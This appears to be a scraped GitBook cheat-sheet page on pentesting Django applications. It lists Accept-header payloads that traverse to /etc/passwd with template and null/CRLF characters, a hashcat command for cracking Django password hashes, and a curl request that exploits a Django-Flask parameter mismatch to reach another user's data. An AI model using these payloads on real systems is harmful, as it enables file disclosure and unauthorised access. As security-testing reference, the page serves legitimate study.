Django

Django Apps Pentesting

Web Application Header Values

Accept: ../../../../.././../../../../etc/passwd{{
Accept: ../../../../.././../../../../etc/passwd{%0D
Accept: ../../../../.././../../../../etc/passwd{%0A
Accept: ../../../../.././../../../../etc/passwd{%00
Accept: ../../../../.././../../../../etc/passwd{%0D{{
Accept: ../../../../.././../../../../etc/passwd{%0A{{
Accept: ../../../../.././../../../../etc/passwd{%00{{
File Inclusion LFI / RFI

[DEBUG=True]

SSTI

SSTI

BadSecrets

Leaked SECRET_KEY

SECRET_KEY required

Password Cracking

hashcat -m 10000 --force django.hash /usr/share/wordlists/rockyou.txt 

Django - Flask: Parameter mismatch

  • Frontend API: Written in Django

  • Backend API (internal service): Written in Flask

  • The frontend /user endpoint checks authorization and then proxies the request to Flask for data handling.

curl -X GET "https://target.com/user?user_id=1234" \
  -H "Content-Type: application/json" \
  -d '{"user_id": 9999}'

Resources

Interesting Books

Interesting Books

Disclaimer: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.

Support this Gitbook

I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.

Last updated